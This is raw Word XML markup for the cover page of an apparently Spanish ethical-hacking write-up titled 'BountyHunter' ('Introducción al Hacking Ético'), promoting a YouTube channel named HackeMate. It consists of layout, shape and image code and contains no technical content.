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6D80A" w14:textId="08587C83" w:rsidR="00C6799C" w:rsidRDefault="007A24E7" w:rsidP="00C6799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4D786C" wp14:editId="19BA12D8">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:posOffset>-1207135</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-325472</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="7814510" cy="1335505"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="1754941979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4510" cy="133550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02ECCA" w14:textId="30C40078" w:rsidR="00A95022" w:rsidRPr="00A95022" w:rsidRDefault="00A95022" w:rsidP="00A95022">
                            <w:pPr>
                              <w:jc w:val="center"/>
                              <w:rPr>
                                <w:rFonts w:ascii="Sans Serif Shaded" w:hAnsi="Sans Serif Shaded" w:cs="Times Sans Serif"/>
                                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                                <w:sz w:val="120"/>
                                <w:szCs w:val="120"/>
                                <w:lang w:val="es-ES"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="004D731F">
                              <w:rPr>
                                <w:rFonts w:ascii="Sans Serif Shaded" w:hAnsi="Sans Serif Shaded" w:cs="Times Sans Serif"/>
                                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                                <w:sz w:val="120"/>
                                <w:szCs w:val="120"/>
                                <w:lang w:val="es-ES"/>
                              </w:rPr>
                              <w:t>BountyHunter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4D786C" id="Rectángulo: esquinas redondeadas 5" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:-95.05pt;margin-top:-25.65pt;width:615.3pt;height:105.1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vsoZQIAACAFAAAOAAAAZHJzL2Uyb0RvYy54bWysVN9P2zAQfp+0/8Hy+0hTWmAVKapATJMQ&#10;IGDi2XXsNprj885uk+6v39lJQ2F9mvaSnH2/v/vOl1dtbdhWoa/AFjw/GXGmrISysquC/3i5/XLB&#10;mQ/ClsKAVQXfKc+v5p8/XTZupsawBlMqZBTE+lnjCr4Owc2yzMu1qoU/AacsKTVgLQIdcZWVKBqK&#10;XptsPBqdZQ1g6RCk8p5ubzoln6f4WisZHrT2KjBTcKotpC+m7zJ+s/mlmK1QuHUl+zLEP1RRi8pS&#10;0iHUjQiCbbD6K1RdSQQPOpxIqDPQupIq9UDd5KMP3TyvhVOpFwLHuwEm///Cyvvts3tEgqFxfuZJ&#10;jF20Guv4p/pYm8DaDWCpNjBJl+cX+WSaE6aSdPnp6XQ6mkY4szd3hz58U1CzKBQcYWPLJxpJQkps&#10;73zo7Pd2MaWF28qYNBZj311Q4HiTvRWapLAzKtoZ+6Q0q0oqbZwSJA6pa4NsK2j6Qkplw1lfYrKO&#10;bpqyDY75MUcT8t6pt41uKnFrcBwdc3yfcfBIWcGGwbmuLOCxAOXPIXNnv+++6zm2H9pl2w9vCeXu&#10;ERlCR3Lv5G1FuN8JHx4FEqtpVrSp4YE+2kBTcOglztaAv4/dR3siG2k5a2hLCu5/bQQqzsx3SzT8&#10;mk8mca3SYTI9H9MBDzXLQ43d1NdAo8jpTXAyidE+mL2oEepXWuhFzEoqYSXlLrgMuD9ch2576UmQ&#10;arFIZrRKToQ7++xkDB4BjpR6aV8Fup58gXh7D/uNErMP9Otso6eFxSaArhI3I8Qdrj30tIaJ4v2T&#10;Eff88Jys3h62+R8AAAD//wMAUEsDBBQABgAIAAAAIQBhhZou4AAAAA0BAAAPAAAAZHJzL2Rvd25y&#10;ZXYueG1sTI/BTsMwDIbvSLxDZCRuW9JBES1NJ4TEESQ2hMTNbbK0WuOUJtsKT493gttv+dPvz9V6&#10;9oM42in2gTRkSwXCUhtMT07D+/Z5cQ8iJiSDQyCr4dtGWNeXFxWWJpzozR43yQkuoViihi6lsZQy&#10;tp31GJdhtMS7XZg8Jh4nJ82EJy73g1wpdSc99sQXOhztU2fb/ebgNbivnZvT6x5XP43/+Bx9Kib5&#10;ovX11fz4ACLZOf3BcNZndajZqQkHMlEMGhZZoTJmOeXZDYgzom5VDqLhlBcKZF3J/1/UvwAAAP//&#10;AwBQSwECLQAUAAYACAAAACEAtoM4kv4AAADhAQAAEwAAAAAAAAAAAAAAAAAAAAAAW0NvbnRlbnRf&#10;VHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQA4/SH/1gAAAJQBAAALAAAAAAAAAAAAAAAAAC8BAABf&#10;cmVscy8ucmVsc1BLAQItABQABgAIAAAAIQAwFvsoZQIAACAFAAAOAAAAAAAAAAAAAAAAAC4CAABk&#10;cnMvZTJvRG9jLnhtbFBLAQItABQABgAIAAAAIQBhhZou4AAAAA0BAAAPAAAAAAAAAAAAAAAAAL8E&#10;AABkcnMvZG93bnJldi54bWxQSwUGAAAAAAQABADzAAAAzAUAAAAA&#10;" filled="f" stroked="f" strokeweight="1pt">
                <v:stroke joinstyle="miter"/>
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="6502ECCA" w14:textId="30C40078" w:rsidR="00A95022" w:rsidRPr="00A95022" w:rsidRDefault="00A95022" w:rsidP="00A95022">
                      <w:pPr>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:rFonts w:ascii="Sans Serif Shaded" w:hAnsi="Sans Serif Shaded" w:cs="Times Sans Serif"/>
                          <w:color w:val="FFFFFF" w:themeColor="background1"/>
                          <w:sz w:val="120"/>
                          <w:szCs w:val="120"/>
                          <w:lang w:val="es-ES"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="004D731F">
                        <w:rPr>
                          <w:rFonts w:ascii="Sans Serif Shaded" w:hAnsi="Sans Serif Shaded" w:cs="Times Sans Serif"/>
                          <w:color w:val="FFFFFF" w:themeColor="background1"/>
                          <w:sz w:val="120"/>
                          <w:szCs w:val="120"/>
                          <w:lang w:val="es-ES"/>
                        </w:rPr>
                        <w:t>BountyHunter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B7425">
        <w:rPr>
          <w:noProof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061F42" wp14:editId="62C6ECB4">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:align>right</wp:align>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-322782</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="7537784" cy="5680953"/>
                <wp:effectExtent l="0" t="0" r="25400" b="3749040"/>
                <wp:wrapNone/>
                <wp:docPr id="717281927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7784" cy="5680953"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:srgbClr val="111927"/>
                        </a:solidFill>
                        <a:effectLst>
                          <a:reflection stA="42000" endPos="65000" dist="508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7C5B6" w14:textId="0C6B4954" w:rsidR="007A24E7" w:rsidRPr="0058283C" w:rsidRDefault="007A24E7" w:rsidP="007A24E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BE13EE" wp14:editId="3C2D0203">
                                  <wp:extent cx="5752214" cy="3982072"/>
                                  <wp:effectExtent l="0" t="0" r="1270" b="0"/>
                                  <wp:docPr id="1237210144" name="Imagen 6" descr="Una señal de alto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7210144" name="Imagen 6" descr="Una señal de alto&#10;&#10;Descripción generada automáticamente con confianza medi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10169" cy="40221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61F42" id="Rectángulo 4" o:spid="_x0000_s1027" style="position:absolute;left:0;text-align:left;margin-left:542.35pt;margin-top:-25.4pt;width:593.55pt;height:447.3pt;z-index:-251658241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fG0wwIAAOIFAAAOAAAAZHJzL2Uyb0RvYy54bWysVE1v2zAMvQ/YfxB0b22nSZMGdYqgRYcB&#10;RRu0HXpWZCkWIIuapHzt14+SHSdrix2GXWxRJB/JJ5LXN7tGk41wXoEpaXGeUyIMh0qZVUl/vN6f&#10;TSjxgZmKaTCipHvh6c3s65frrZ2KAdSgK+EIghg/3dqS1iHYaZZ5XouG+XOwwqBSgmtYQNGtssqx&#10;LaI3Ohvk+WW2BVdZB1x4j7d3rZLOEr6UgocnKb0IRJcUcwvp69J3Gb/Z7JpNV47ZWvEuDfYPWTRM&#10;GQzaQ92xwMjaqQ9QjeIOPMhwzqHJQErFRaoBqynyd9W81MyKVAuS421Pk/9/sPxx82IXDmnYWj/1&#10;eIxV7KRr4h/zI7tE1r4nS+wC4Xg5Hl2Mx5MhJRx1o8tJfjW6iHRmR3frfPgmoCHxUFKHr5FIYpsH&#10;H1rTg0mM5kGr6l5pnQS3Wt5qRzYMX64oiqvBuEP/w0ykN0a46OOE1BgDWxF7bl7SIXZIashqAcjZ&#10;5SiJlYrJjPJJ1FUKm2E0REWUPJZyVnQC0yts6aWmxEF4U6FOz9HxgFWehM6O5KVT2GsRE9LmWUii&#10;KqRrkCpPfS36uhjnwoSiVdWsEl25KdGWoN4jMZsAI7JEmnrsDiDOzEfsFqazj65t3r1z/rfEWufe&#10;I0UGE3rnRhlwnwForKqL3Npj+ifUxGPYLXfIDb5utIw3S6j2CxfpTj3nLb9X2DkPzIcFcziX+ES4&#10;a8ITfqSGbUmhO1FSg/v12X20x3FBLSVbnPOS+p9r5gQl+rvBprgqhkOEDUkYjsYDFNypZnmqMevm&#10;FmJDYq9Yno7RPujDUTpo3nAlzWNUVDHDMXZJeXAH4Ta0+weXGhdzbFM0w2VgWXgwL5ZH8MhznIzX&#10;3RtzthufgJP3CIedwKbvpqi1jZ4G5usAUqURO/LavQAuktRK3dKLm+pUTlbH1Tz7DQAA//8DAFBL&#10;AwQUAAYACAAAACEAA2LpTeAAAAAJAQAADwAAAGRycy9kb3ducmV2LnhtbEyPQU+DQBCF7yb+h82Y&#10;eDHtQrFKkKFRq0kvHKQ9eNyyIxDZWcJuC/57tyc9Tt7kve/LN7PpxZlG11lGiJcRCOLa6o4bhMP+&#10;fZGCcF6xVr1lQvghB5vi+ipXmbYTf9C58o0IJewyhdB6P2RSurolo9zSDsQh+7KjUT6cYyP1qKZQ&#10;bnq5iqIHaVTHYaFVA722VH9XJ4OQTIncrT/LarV96w/7u5fSbpMS8fZmfn4C4Wn2f89wwQ/oUASm&#10;oz2xdqJHCCIeYbGOgsAljtPHGMQRIb1PUpBFLv8bFL8AAAD//wMAUEsBAi0AFAAGAAgAAAAhALaD&#10;OJL+AAAA4QEAABMAAAAAAAAAAAAAAAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYA&#10;CAAAACEAOP0h/9YAAACUAQAACwAAAAAAAAAAAAAAAAAvAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYA&#10;CAAAACEArCHxtMMCAADiBQAADgAAAAAAAAAAAAAAAAAuAgAAZHJzL2Uyb0RvYy54bWxQSwECLQAU&#10;AAYACAAAACEAA2LpTeAAAAAJAQAADwAAAAAAAAAAAAAAAAAdBQAAZHJzL2Rvd25yZXYueG1sUEsF&#10;BgAAAAAEAAQA8wAAACoGAAAAAA==&#10;" fillcolor="#111927" strokecolor="#09101d [484]" strokeweight="1pt">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="6FC7C5B6" w14:textId="0C6B4954" w:rsidR="007A24E7" w:rsidRPr="0058283C" w:rsidRDefault="007A24E7" w:rsidP="007A24E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BE13EE" wp14:editId="3C2D0203">
                            <wp:extent cx="5752214" cy="3982072"/>
                            <wp:effectExtent l="0" t="0" r="1270" b="0"/>
                            <wp:docPr id="1237210144" name="Imagen 6" descr="Una señal de alto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7210144" name="Imagen 6" descr="Una señal de alto&#10;&#10;Descripción generada automáticamente con confianza media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10169" cy="40221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C6799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E48AEB" wp14:editId="13DFD1E2">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:align>right</wp:align>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-899795</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="7543800" cy="501614"/>
                <wp:effectExtent l="0" t="0" r="19050" b="13335"/>
                <wp:wrapNone/>
                <wp:docPr id="488299274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50161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8F483" w14:textId="2F429E4D" w:rsidR="00697D45" w:rsidRPr="00C6799C" w:rsidRDefault="007D5522" w:rsidP="00697D45">
                            <w:pPr>
                              <w:jc w:val="center"/>
                              <w:rPr>
                                <w:rFonts w:ascii="Grandview" w:hAnsi="Grandview" w:cs="Sans Serif Collection"/>
                                <w:sz w:val="48"/>
                                <w:szCs w:val="48"/>
                                <w:lang w:val="es-ES"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Grandview" w:hAnsi="Grandview" w:cs="Sans Serif Collection"/>
                                <w:sz w:val="48"/>
                                <w:szCs w:val="48"/>
                                <w:lang w:val="es-ES"/>
                              </w:rPr>
                              <w:t>Introducción al Hacking Ético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48AEB" id="Rectángulo 2" o:spid="_x0000_s1028" style="position:absolute;left:0;text-align:left;margin-left:542.8pt;margin-top:-70.85pt;width:594pt;height:39.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AQegIAAFgFAAAOAAAAZHJzL2Uyb0RvYy54bWysVMFu2zAMvQ/YPwi6r7azpO2COkWQIsOA&#10;oi3aDj0rslQLkEVNUmJnXz9KdpysK3YYdrEpkXwkn0heXXeNJjvhvAJT0uIsp0QYDpUyryX9/rz+&#10;dEmJD8xUTIMRJd0LT68XHz9ctXYuJlCDroQjCGL8vLUlrUOw8yzzvBYN82dghUGlBNewgEf3mlWO&#10;tYje6GyS5+dZC66yDrjwHm9veiVdJHwpBQ/3UnoRiC4p5hbS16XvJn6zxRWbvzpma8WHNNg/ZNEw&#10;ZTDoCHXDAiNbp/6AahR34EGGMw5NBlIqLlINWE2Rv6nmqWZWpFqQHG9Hmvz/g+V3uyf74JCG1vq5&#10;RzFW0UnXxD/mR7pE1n4kS3SBcLy8mE0/X+bIKUfdLC/Oi2lkMzt6W+fDVwENiUJJHT5G4ojtbn3o&#10;TQ8mMZgHraq10jodYgOIlXZkx/DpQlcM4CdW2THlJIW9FtFXm0chiaowyUkKmLrpCMY4FyYUvapm&#10;lehjFLMcy+nzGj1SQQkwIkvMbsQeAH5P9IDdwwz20VWkZhyd878l1juPHikymDA6N8qAew9AY1VD&#10;5N4e0z+hJoqh23TITaQGLePNBqr9gyMO+uHwlq8VPtgt8+GBOZwGfGOc8HCPH6mhLSkMEiU1uJ/v&#10;3Ud7bFLUUtLidJXU/9gyJyjR3wy275diOo3jmA7T2cUED+5UsznVmG2zAuyCAneJ5UmM9kEfROmg&#10;ecFFsIxRUcUMx9gl5cEdDqvQTz2uEi6Wy2SGI2hZuDVPlkfwyHNsyOfuhTk7dG3Afr+DwySy+Zvm&#10;7W2jp4HlNoBUqbOPvA4vgOObWmlYNXE/nJ6T1XEhLn4BAAD//wMAUEsDBBQABgAIAAAAIQDAbNdB&#10;3wAAAAoBAAAPAAAAZHJzL2Rvd25yZXYueG1sTI/BasMwEETvhf6D2EJviSwTEuNaDnUhhF4cmgR6&#10;VaytbWpJRlIc9++7ObXHnRlm3xTb2QxsQh96ZyWIZQIMbeN0b1sJ59NukQELUVmtBmdRwg8G2JaP&#10;D4XKtbvZD5yOsWVUYkOuJHQxjjnnoenQqLB0I1ryvpw3KtLpW669ulG5GXiaJGtuVG/pQ6dGfOuw&#10;+T5ejYSqFpVfTTWm+/q8i5/7Q/NeHaR8fppfX4BFnONfGO74hA4lMV3c1erABgk0JEpYiJXYALv7&#10;IstIu5C2TjfAy4L/n1D+AgAA//8DAFBLAQItABQABgAIAAAAIQC2gziS/gAAAOEBAAATAAAAAAAA&#10;AAAAAAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhADj9If/WAAAAlAEA&#10;AAsAAAAAAAAAAAAAAAAALwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAIeygBB6AgAAWAUA&#10;AA4AAAAAAAAAAAAAAAAALgIAAGRycy9lMm9Eb2MueG1sUEsBAi0AFAAGAAgAAAAhAMBs10HfAAAA&#10;CgEAAA8AAAAAAAAAAAAAAAAA1AQAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAABAAEAPMAAADgBQAA&#10;AAA=&#10;" fillcolor="black [3213]" strokecolor="#09101d [484]" strokeweight="1pt">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="1788F483" w14:textId="2F429E4D" w:rsidR="00697D45" w:rsidRPr="00C6799C" w:rsidRDefault="007D5522" w:rsidP="00697D45">
                      <w:pPr>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:rFonts w:ascii="Grandview" w:hAnsi="Grandview" w:cs="Sans Serif Collection"/>
                          <w:sz w:val="48"/>
                          <w:szCs w:val="48"/>
                          <w:lang w:val="es-ES"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Grandview" w:hAnsi="Grandview" w:cs="Sans Serif Collection"/>
                          <w:sz w:val="48"/>
                          <w:szCs w:val="48"/>
                          <w:lang w:val="es-ES"/>
                        </w:rPr>
                        <w:t>Introducción al Hacking Ético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9452D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1C49A3" wp14:editId="5597070C">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:align>right</wp:align>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>9074150</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="7543800" cy="704850"/>
                <wp:effectExtent l="0" t="0" r="19050" b="19050"/>
                <wp:wrapNone/>
                <wp:docPr id="1949164529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7048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78B48" w14:textId="69D74929" w:rsidR="00C6799C" w:rsidRPr="00A56118" w:rsidRDefault="007A24E7" w:rsidP="00C6799C">
                            <w:pPr>
                              <w:jc w:val="center"/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B97266" wp14:editId="6C6B4231">
                                  <wp:extent cx="270934" cy="187375"/>
                                  <wp:effectExtent l="0" t="0" r="0" b="3175"/>
                                  <wp:docPr id="654267720" name="Imagen 1" descr="Una señal de alto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4267720" name="Imagen 654267720" descr="Una señal de alto&#10;&#10;Descripción generada automáticamente con confianza media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V="1">
                                            <a:off x="0" y="0"/>
                                            <a:ext cx="283210" cy="195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  <w:t xml:space="preserve">  </w:t>
                            </w:r>
                            <w:r w:rsidR="00C6799C" w:rsidRPr="00A56118"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  <w:t xml:space="preserve">Para más contenido visita mi canal de </w:t>
                            </w:r>
                            <w:r w:rsidR="00A56118" w:rsidRPr="00A56118"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  <w:t>YouTube</w:t>
                            </w:r>
                            <w:r w:rsidR="00C6799C" w:rsidRPr="00A56118"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  <w:t>: HackeMate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C49A3" id="_x0000_s1029" style="position:absolute;left:0;text-align:left;margin-left:542.8pt;margin-top:714.5pt;width:594pt;height:55.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P4nfQIAAFgFAAAOAAAAZHJzL2Uyb0RvYy54bWysVEtv2zAMvg/YfxB0X22nydoFdYqgRYcB&#10;RRusHXpWZKkWIIuapMTOfv0o+ZGgK3YYdrFJkfz45tV112iyF84rMCUtznJKhOFQKfNa0h/Pd58u&#10;KfGBmYppMKKkB+Hp9erjh6vWLsUMatCVcARBjF+2tqR1CHaZZZ7XomH+DKwwKJTgGhaQda9Z5ViL&#10;6I3OZnn+OWvBVdYBF97j620vpKuEL6Xg4VFKLwLRJcXYQvq69N3Gb7a6YstXx2yt+BAG+4coGqYM&#10;Op2gbllgZOfUH1CN4g48yHDGoclASsVFygGzKfI32TzVzIqUCxbH26lM/v/B8of9k904LENr/dIj&#10;GbPopGviH+MjXSrWYSqW6ALh+HixmJ9f5lhTjrKLfH65SNXMjtbW+fBVQEMiUVKHzUg1Yvt7H9Aj&#10;qo4q0ZkHrao7pXVi4gCIG+3InmHrQlfEVqHFiVZ2DDlR4aBFtNXmu5BEVRjkLDlM03QEY5wLE4pe&#10;VLNK9D6KRY7pDF5G98lnAozIEqObsAeAUbMHGbF7mEE/moo0jJNx/rfAeuPJInkGEybjRhlw7wFo&#10;zGrw3Otj+CeliWToth3WpqTnUTO+bKE6bBxx0C+Ht/xOYcPumQ8b5nAbsMe44eERP1JDW1IYKEpq&#10;cL/ee4/6OKQopaTF7Sqp/7ljTlCivxkc3y/FfB7XMTHzxcUMGXcq2Z5KzK65AZyCAm+J5YmM+kGP&#10;pHTQvOAhWEevKGKGo++S8uBG5ib0W4+nhIv1OqnhCloW7s2T5RE81jkO5HP3wpwdpjbgvD/AuIls&#10;+WZ4e91oaWC9CyBVmuxjXYcO4PqmURpOTbwPp3zSOh7E1W8AAAD//wMAUEsDBBQABgAIAAAAIQBD&#10;1tSJ3wAAAAsBAAAPAAAAZHJzL2Rvd25yZXYueG1sTI/BTsMwEETvSPyDtUjcqJ0ooBDiVASpqrik&#10;olTi6sZLEhHbke2m4e/Znuhtdmc1+6ZcL2ZkM/owOCshWQlgaFunB9tJOHxuHnJgISqr1egsSvjF&#10;AOvq9qZUhXZn+4HzPnaMQmwolIQ+xqngPLQ9GhVWbkJL3rfzRkUafce1V2cKNyNPhXjiRg2WPvRq&#10;wrce25/9yUiom6T22dxgum0Om/i13bXv9U7K+7vl9QVYxCX+H8MFn9ChIqajO1kd2CiBikTaZukz&#10;qYuf5DmpI6nHTAjgVcmvO1R/AAAA//8DAFBLAQItABQABgAIAAAAIQC2gziS/gAAAOEBAAATAAAA&#10;AAAAAAAAAAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhADj9If/WAAAA&#10;lAEAAAsAAAAAAAAAAAAAAAAALwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAP6s/id9AgAA&#10;WAUAAA4AAAAAAAAAAAAAAAAALgIAAGRycy9lMm9Eb2MueG1sUEsBAi0AFAAGAAgAAAAhAEPW1Inf&#10;AAAACwEAAA8AAAAAAAAAAAAAAAAA1wQAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAABAAEAPMAAADj&#10;BQAAAAA=&#10;" fillcolor="black [3213]" strokecolor="#09101d [484]" strokeweight="1pt">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="2BA78B48" w14:textId="69D74929" w:rsidR="00C6799C" w:rsidRPr="00A56118" w:rsidRDefault="007A24E7" w:rsidP="00C6799C">
                      <w:pPr>
                        <w:jc w:val="center"/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3B97266" wp14:editId="6C6B4231">
                            <wp:extent cx="270934" cy="187375"/>
                            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
                            <wp:docPr id="654267720" name="Imagen 1" descr="Una señal de alto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4267720" name="Imagen 654267720" descr="Una señal de alto&#10;&#10;Descripción generada automáticamente con confianza media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V="1">
                                      <a:off x="0" y="0"/>
                                      <a:ext cx="283210" cy="195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  <w:t xml:space="preserve">  </w:t>
                      </w:r>
                      <w:r w:rsidR="00C6799C" w:rsidRPr="00A56118"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  <w:t xml:space="preserve">Para más contenido visita mi canal de </w:t>
                      </w:r>
                      <w:r w:rsidR="00A56118" w:rsidRPr="00A56118"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  <w:t>YouTube</w:t>
                      </w:r>
                      <w:r w:rsidR="00C6799C" w:rsidRPr="00A56118"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  <w:t>: HackeMate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52A47AA" w14:textId="17252DBD" w:rsidR="00C6799C" w:rsidRDefault="00C6799C" w:rsidP="00C6799C">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="281F5CC9" w14:textId="5F7894DF" w:rsidR="00C6799C" w:rsidRDefault="007A24E7" w:rsidP="00C6799C">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00C6799C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251662336" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0134DFAC" wp14:editId="49055EAF">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>1072445</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>133809</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3458845" cy="3235960"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="1279733849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33849" name="Imagen 1" descr="Logotipo&#10;&#10;Descripción generada automáticamente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9138" b="90000" l="9194" r="90000">
                                  <a14:foregroundMark x1="44839" y1="9138" x2="44839" y2="9138"/>
                                  <a14:foregroundMark x1="9194" y1="50000" x2="9194" y2="50000"/>
                                  <a14:foregroundMark x1="70161" y1="70517" x2="70161" y2="70517"/>
                                  <a14:foregroundMark x1="70645" y1="70517" x2="78065" y2="71897"/>
                                  <a14:foregroundMark x1="68065" y1="76379" x2="72097" y2="77759"/>
                                  <a14:foregroundMark x1="74355" y1="77759" x2="78306" y2="77759"/>
                                  <a14:foregroundMark x1="66613" y1="78621" x2="73871" y2="74483"/>
                                  <a14:foregroundMark x1="70645" y1="73966" x2="67097" y2="73966"/>
                                  <a14:foregroundMark x1="69355" y1="71379" x2="67581" y2="71379"/>
                                  <a14:foregroundMark x1="74355" y1="84310" x2="74355" y2="84310"/>
                                  <a14:foregroundMark x1="64194" y1="75345" x2="64194" y2="75345"/>
                                  <a14:foregroundMark x1="64194" y1="75345" x2="64194" y2="75345"/>
                                  <a14:foregroundMark x1="64194" y1="75345" x2="64194" y2="78448"/>
                                  <a14:foregroundMark x1="64194" y1="78448" x2="65161" y2="80345"/>
                                  <a14:foregroundMark x1="65161" y1="80345" x2="75645" y2="82241"/>
                                  <a14:foregroundMark x1="76935" y1="82241" x2="76935" y2="82241"/>
                                  <a14:foregroundMark x1="76935" y1="82241" x2="71290" y2="82931"/>
                                  <a14:foregroundMark x1="73548" y1="84310" x2="73548" y2="84310"/>
                                  <a14:foregroundMark x1="71452" y1="84310" x2="71452" y2="84310"/>
                                  <a14:backgroundMark x1="80000" y1="78103" x2="80000" y2="78103"/>
                                  <a14:backgroundMark x1="80000" y1="78103" x2="79677" y2="78621"/>
                                  <a14:backgroundMark x1="80000" y1="78103" x2="80000" y2="77241"/>
                                  <a14:backgroundMark x1="80000" y1="77241" x2="80484" y2="78621"/>
                                  <a14:backgroundMark x1="74516" y1="84483" x2="74516" y2="84483"/>
                                  <a14:backgroundMark x1="73710" y1="84483" x2="73710" y2="84483"/>
                                  <a14:backgroundMark x1="74032" y1="84483" x2="74032" y2="844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D06F7" w14:textId="50E778D0" w:rsidR="00C6799C" w:rsidRDefault="00C6799C" w:rsidP="00C6799C">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="277E938A" w14:textId="6B63ABE9" w:rsidR="00C6799C" w:rsidRDefault="00C6799C" w:rsidP="00C6799C">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="186B3DD1" w14:textId="677D3EC3" w:rsidR="00C6799C" w:rsidRDefault="00C6799C" w:rsidP="00C6799C">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="616426D7" w14:textId="18C041F9" w:rsidR="00A56118" w:rsidRDefault="00A56118" w:rsidP="00C6799C">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56697DCD" w14:textId="4092DDF7" w:rsidR="00A56118" w:rsidRDefault="00A56118" w:rsidP="00C6799C">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="714FDFBA" w14:textId="1C49396C" w:rsidR="00A56118" w:rsidRDefault="00A56118" w:rsidP="00C6799C">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5AD85347" w14:textId="5D8400E1" w:rsidR="00A56118" w:rsidRDefault="00A56118" w:rsidP="00C6799C">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68556A40" w14:textId="75B0B701" w:rsidR="00A56118" w:rsidRDefault="00A56118" w:rsidP="00C6799C">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A4F087F" w14:textId="5459298A" w:rsidR="00A56118" w:rsidRDefault="00A56118" w:rsidP="00C6799C">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6BE59930" w14:textId="768EA104" w:rsidR="00A56118" w:rsidRDefault="00424318" w:rsidP="00C6799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E62801" wp14:editId="76D6AF11">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1772920</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>180651</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1955800" cy="295910"/>
                <wp:effectExtent l="0" t="0" r="25400" b="27940"/>
                <wp:wrapNone/>
                <wp:docPr id="559427013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959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D599FC" w14:textId="3E8940C8" w:rsidR="00A95022" w:rsidRPr="00663D49" w:rsidRDefault="00A95022" w:rsidP="00A95022">
                            <w:pPr>
                              <w:jc w:val="center"/>
                              <w:rPr>
                                <w:rFonts w:ascii="Times Sans Serif" w:hAnsi="Times Sans Serif" w:cs="Times Sans Serif"/>
                                <w:color w:val="000000" w:themeColor="text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663D49">
                              <w:rPr>
                                <w:rFonts w:ascii="Times Sans Serif" w:hAnsi="Times Sans Serif" w:cs="Times Sans Serif"/>
                                <w:color w:val="000000" w:themeColor="text1"/>
                                <w:sz w:val="20"/>
                                <w:szCs w:val="20"/>
                                <w:lang w:val="es-ES"/>
                              </w:rPr>
